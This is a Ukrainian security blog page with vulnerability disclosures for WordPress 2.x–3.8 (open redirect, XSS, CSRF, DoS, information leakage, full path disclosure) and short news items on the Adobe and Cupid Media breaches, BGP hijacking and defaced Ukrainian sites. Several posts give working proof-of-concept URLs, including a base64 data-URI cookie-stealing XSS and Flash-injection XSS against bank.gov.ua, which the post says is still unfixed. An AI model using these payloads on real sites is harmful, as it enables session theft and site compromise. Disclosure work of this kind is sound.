Websecurity - Веб безпека

Сьогодні я провів проект День багів в WordPress 3 (Day of bugs in WordPress 3). За цей день я опублікував чимало уразливостей в WordPress. Всього 10 дірок - це Information Leakage, Backdoor, Cross-Site Request Forgery, Denial of Service, URL Redirector Abuse та Cross-Site Scripting уразливості в різних версіях WP.

• Information Leakage та Backdoor уразливості в WordPress
• CSRF, DoS та IL уразливості в WordPress
• URL Redirector Abuse та XSS уразливості в WordPress

В своєму проекті я опублікував різні цікаві уразливості в WP. І з часом я ще оприлюдню нові уразливості в WordPress.

P.S.

А тим часом можете подивися мої відео з Євромайдану в Києві.

Продовжую проект День багів в WordPress 3. В цьому році я вже публікував дірки в WP і зараз опублікую нові. Зараз я оприлюдню URL Redirector Abuse та Cross-Site Scripting уразливості в WordPress.

Які я знайшов 26.04.2012, одразу як оприлюднив попередні Redirector та XSS уразливості в WP. Тоді я знайшов багато подібних уразливостей - це лише декілька Redirector та XSS дірок в WP.

Redirector (URL Redirector Abuse) (WASC-38):

http://site/wp-admin/edit-tags.php?action=delete&_wp_http_referer=http://websecurity.com.ua/?edit-tags.php

XSS (WASC-08):

http://site/wp-admin/edit-tags.php?action=delete&_wp_http_referer=data:text/html;edit-tags.php;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

Уразливі WordPress 3.6 та попередні версії.

Redirector (URL Redirector Abuse) (WASC-38):

Можливий лише Redirector, але не XSS (в зв’язку з фільтрацією важливих символів). Для атаки потрібно знати значення _wpnonce.

http://site/wp-admin/edit-tags.php?action=add-tag&_wpnonce=096ea8dbbd&_wp_original_http_referer=http://websecurity.com.ua/?edit-tags.php

Уразливі WordPress 3.0 - 3.6.

http://site/wp-admin/edit-tags.php?action=bulk-delete&_wpnonce=ebee6d0330&_wp_http_referer=http://websecurity.com.ua/?edit-tags.php
http://site/wp-admin/media.php?action=editattachment&_wpnonce=2fa131c992&_wp_original_http_referer=http://websecurity.com.ua/?upload.php

Уразливі WordPress 3.6 та попередні версії.

Продовжую проект День багів в WordPress 3. В цьому році я вже публікував дірки в WP і зараз опублікую нові. Зараз я оприлюдню Cross-Site Request Forgery, Denial of Service та Information Leakage уразливості в WordPress, які я знайшов 06.08.2007 (IL) і 31.03.2012 (CSRF і DoS).

Cross-Site Request Forgery (WASC-09) / Denial of Service (WASC-10):

В функціоналі retrospam немає захисту від CSRF.

http://site/wp-admin/options-discussion.php?action=retrospam

Запит запускає перевірку коментарів по стоп-словам, що створює навантаження на сервер. Чим більше слів у списку (а через XSS уразливість їх туди можна додати будь-яку кількість) і чим більше коментарів на сайті, тим більше навантаження.

Cross-Site Request Forgery (WASC-09):

http://site/wp-admin/options-discussion.php?action=retrospam&move=true&ids=1

Запит переносить коментарі, включаючи відмодеровані, до списку модерації. Потрібно лише вказати id коментарів.

Уразливі WordPress 2.0.11 та попередні версії (де був даний функціонал).

Information Leakage (WASC-13):

При звернені до скрипта options.php можна отримати всі важливі дані з БД. Як при доступі в адмінку, так і можна отримати зміст сторінки через XSS атаку. Зокрема різні ключі, солі, логіни і паролі, такі як auth_key, auth_salt, logged_in_key, logged_in_salt, nonce_key, nonce_salt, mailserver_login, mailserver_pass (кількість параметрів залежить від версії WP). Про витік логіну і паролю до електронної пошти в іншому розділі адмінки я вже писав раніше (це друга сторінка, де має місце витік цих даних).

http://site/wp-admin/options.php

Уразливі WordPress 3.7.1 та попередні версії (та в WP 3.8, що вийшов у грудні).

Сьогодні, в День багів в WordPress 3, я оприлюдню багато цікавих уразливостей в WP. В цьому році я вже публікував дірки в WP і зараз опублікую нові. Першими я оприлюдню Information Leakage та Backdoor уразливості в WordPress, що відомі мені ще з червня 2006, коли тільки почав користуватися WP. І які все ще актуальні для всіх версій движка.

Information Leakage (WASC-13):

В БД зберігаються логін і пароль від емайла у відкритій формі в Writing Settings (http://site/wp-admin/options-writing.php), якщо використовується цей функціонал. Тому отримавши дані з БД через SQL Injection чи Information Leakage уразливість, чи отримавши зміст цієї сторінки через XSS, чи отримавши доступ в адмінку через будь-яку уразливість, можна отримати логін і пароль від емайла.

Що дозволить захопити доступ як до цього сайта (через функцію зміни пароля), коли знову знадобиться отримати доступ до сайта, так і до інших сайтів, де є функція відновлення/зміни пароля, що надішлють листи на цей емайл. Бо користувач може використати свій основний емайл (що мені доводилося зустрічати в Інтернеті).

Backdoor:

Цей функціонал також може використовуватися як бекдор. Коли в опціях Writing Settings задається емайл зловмисника, звідки будуть розміщуватися повідомлення на сайт. З XSS кодом, з black SEO лінками, з кодом malware, тощо.

Уразливі WordPress 3.7.1 та попередні версії (та в WP 3.8, що вийшов у грудні).

Окрім виправлення декількох уразливостей у версії WordPress 3.6.1, про які згадали у анонсі, розробники ще виправили три уразливості. Але про них розробники WP навмисно не повідомили (для применшення офіційної кількості виправлених дірок).

В цьому місяці я дослідив зміни в версії 3.6.1 движка і виявив три Full path disclosure уразливості. Про які не згадали ні в описі релізу WP 3.6.1, ні в Codex (при тому, що вони іноді згадують про FPD). Що типово для розробників WP - ще з 2007 року вони часто приховують виправлені уразливості.

Раніше я вже писав про FPD уразливості в WordPress.

Full path disclosure (WASC-13):

В функції get_allowed_mime_types().
В функції set_url_scheme().
В функції comment_form().

Уразливі WordPress 3.6 та попередні версії.

За повідомленням www.xakep.ru, 130 000 000 паролів Adobe виклали у відкритий доступ і частково розшифрували.

У першому повідомленні про крадіжку паролів мільйонів своїх користувачів компанія Adobe сказала, що громадянам немає чого побоюватися, тому що паролі зашифровані.

Поки співтовариство не одержало базу з паролями, фраза про “зашифровані” паролі була незрозумілою. Можна було припустити, що Adobe мала на увазі хешування.

Але істина виявилася не такою радісною. Файл із 130 324 429 паролями незабаром потрапив у відкритий доступ, так що усі одержали можливість переконатися, як саме зашифровані паролі. Adobe використовувала симетричний блоковий шифр 3DES у режимі Electronic Code Book (ECB). При цьому з’ясувалося, що витік даних має безпрецедентний масштаб: мова йде зовсім не про 2,9 мільйонів паролів, як раніше стверджувала Adobe.

За повідомленням www.opennet.ru, виявлено техніку MITM-атак, засновану на підстановці фіктивних BGP-маршрутів.

Компанія Renesys, що спеціалізується на моніторингу роботи глобальної мережі, зафіксувала успішні спроби проведення атаки, спрямованої на перенапрямок потоків трафіка. Це може використовуватися для MITM-атак.

Атака організується через формування підставних BGP-маршрутів, що у сумі дозволяють вплинути на пріоритети вибору шляху проходження трафіка й організувати проходження потоку через підконтрольну територію. Наприклад, подібним чином може бути організоване перехоплення локального трафіка однієї країни спецслужбами іншої країни.

За повідомленням www.xakep.ru, взлом сайтів знайомств Cupid Media: 42 млн. паролів відкритим текстом.

Продовжується низка великих взломів з витоками мільйонів паролів. Слідом за Adobe така неприємність сталася з компанією Cupid Media, якій належить більше 30 нішевих сайтів знайомств у різних районах світу, у тому числі в Росії й Україні.

Раніше на сервері хакерів були знайдені вихідні тексти програм і зашифровані паролі 130 млн користувачів Adobe. Зараз виявився ще один цікавий файл, що містить 42 млн паролів Cupid Media відкритим текстом, із зазначенням адреси електронної пошти, імені, прізвища і дати народження кожного користувача.

Великі взломи персональних даних відбуваються регулярно: витоки були як в попередні роки, так і в цьому році. Витоки даних Adobe та Cupid Media будуть одними з найбільших в 2013 році.

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://iitzo.gov.ua (хакером d3b~X) - 21.11.2013 - похаканий державний сайт, сторінка хакера все ще знаходиться на сайті
• http://sez.crimea.ua (хакером S4L4M) - 06.08.2013, зараз сайт вже виправлений адмінами
• http://stomadent.com.ua (хакерами з Iran Security Team) - 02.08.2013, зараз сайт вже виправлений адмінами
• http://greenmix.com.ua (хакерами з Iran Security Team) - 04.08.2013, зараз сайт вже виправлений адмінами
• http://sensei-school.com.ua (хакерами з Iran Security Team) - 12.08.2013, зараз сайт вже виправлений адмінами

В даній добірці уразливості в веб додатках:

• Sitecom WLM-3500 backdoor accounts (деталі)
• Moodle 2.5.0-1 (badges/external.php) PHP Object Injection Vulnerability (деталі)
• Multiple vulnerabilities in MediaWiki (деталі)
• ExpressionEngine 2.6 Persistent XSS (деталі)
• SQL Injection in vtiger CRM (деталі)

14.08.2013

У травні, 22.05.2013, я знайшов Content Spoofing та Cross-Site Scripting уразливості на http://www.bank.gov.ua - сайті Національного банку України. Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже писав про уразливість на www.bank.gov.ua. Стосовно уразливостей на сайтах банків останній раз я писав про уразливості на www.blog.privatbank.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

28.11.2013

XSS (через Flash Injection):

http://www.bank.gov.ua/js/uflvplayer_500x375.swf?way=http://site/1.flv&skin=xss.swf

В старих версіях флеша атака спрацює з флешкою xss.swf на будь-яких доменах, а в нових версіях - лише на тому самому домені.

Content Spoofing (Flash Injection):

http://www.bank.gov.ua/js/uflvplayer_500x375.swf?way=http://site/1.flv&skin=http://site/1.swf

Content Spoofing (Content Injection):

http://www.bank.gov.ua/js/uflvplayer_500x375.swf?way=http://site/1.flv
http://www.bank.gov.ua/js/uflvplayer_500x375.swf?way=http://site/1.flv&pic=http://site/1.jpg

Content Spoofing (HTML Injection):

http://www.bank.gov.ua/js/uflvplayer_500x375.swf?way=http://site&comment=test%3Cimg%20src=%27http://site/1.jpg%27%3E

XSS:

http://www.bank.gov.ua/js/uflvplayer_500x375.swf?way=http://site&comment=+%3Cimg%20src=%27xss.swf%27%3E

В старих версіях флеша атака спрацює з флешкою xss.swf на будь-яких доменах, а в нових версіях - лише на тому самому домені. Також можлива Strictly social XSS атака.

Дані уразливості досі не виправлені.

В період з 13.10.2012 по 02.12.2012 та з 15.01.2013 по 26.04.2013 відбувся третій масовий взлом сайтів на сервері Hetzner. Нещодавно я вже розповідав про інші масові взломи.

Був взломаний сервер німецької компанії Hetzner, на якому хостилися українські та російські сайти. Взлом складався з декількох дефейсів сайтів. Раніше я писав про другий масовий взлом сайтів на сервері Hetzner.

Всього було взломано 62 сайти на сервері компанії Hetzner (IP 5.9.7.9). Перелік сайтів можете подивитися на www.zone-h.org. Серед них український державний сайт kpdozvil.gov.ua. Це черговий державний сайт, що хоститься закордоном.

Якщо невеликі дефейси по одному або кілька сайтів явно були зроблені при взломах окремих сайтів, то стосовно дефейсу HighTech можна сказати, що враховуючи дефейс великої кількості сайтів за один день, немає сумнівів, що вони були взломані через взлом серверу хостінг провайдера. Коли через взлом одного сайта, був отриманий root доступ до сервера (через уразливості в програмному забезпеченні самого сервера) та атаковані інші сайти на даному сервері.